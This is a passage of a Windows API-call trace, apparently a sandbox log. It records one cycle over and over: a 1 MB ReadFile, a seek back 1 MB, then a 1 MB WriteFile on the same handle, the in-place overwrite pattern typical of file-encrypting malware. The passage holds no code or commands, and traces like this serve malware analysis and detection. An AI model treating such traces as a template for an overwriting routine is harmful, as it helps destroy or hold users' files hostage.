nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0045.206] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0045.229] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0045.229] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0045.232] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0045.247] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0045.248] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0045.249] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0045.284] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0045.284] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0045.286] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0045.306] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0045.306] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0045.307] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0045.317] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0045.317] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0045.326] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0045.355] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0045.355] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0045.357] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0045.395] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0045.395] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0045.397] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0045.412] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0045.412] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0045.415] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0045.444] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0045.444] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0045.446] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0045.523] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0045.523] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0045.525] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0045.629] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0045.629] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0045.631] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0045.649] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0045.649] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0045.660] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0045.673] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0045.673] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0045.731] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0045.757] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0045.757] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0045.760] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0045.838] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0045.838] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0045.843] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0045.863] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0045.863] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0045.866] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0045.882] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0045.882] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0045.966] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0045.979] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0045.979] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0045.981] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0045.998] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0045.998] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0046.000] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0046.109] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0046.109] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0046.111] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0046.128] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0046.128] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0046.130] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0046.276] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0046.276] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0046.278] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0046.299] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0046.299] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0046.302] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0046.359] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0046.359] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0046.362] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0046.375] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0046.375] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0046.378] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0046.410] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0046.410] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0046.412] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0046.425] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0046.425] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0046.428] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0046.445] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0046.445] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0046.448] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0046.475] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0046.475] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0046.478] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0046.616] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0046.616] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0046.618] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0046.639] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0046.639] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0046.641] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0046.672] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0046.672] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0046.674] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0046.696] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0046.696] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0046.698] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0046.744] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0046.744] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0046.746] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0046.759] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0046.760] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0046.762] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0046.792] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0046.792] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0046.794] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0046.808] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0046.808] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x36f0000*, lpNumberOfBytesWritten=0x338f478*=0x100000, lpOverlapped=0x0) returned 1 [0046.810] ReadFile (in: hFile=0x320, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338f47c*=0x100000, lpOverlapped=0x0) returned 1 [0046.844] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0046.844] WriteFile (in: hFile=0x320, lpBuffer=0x36f0000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: 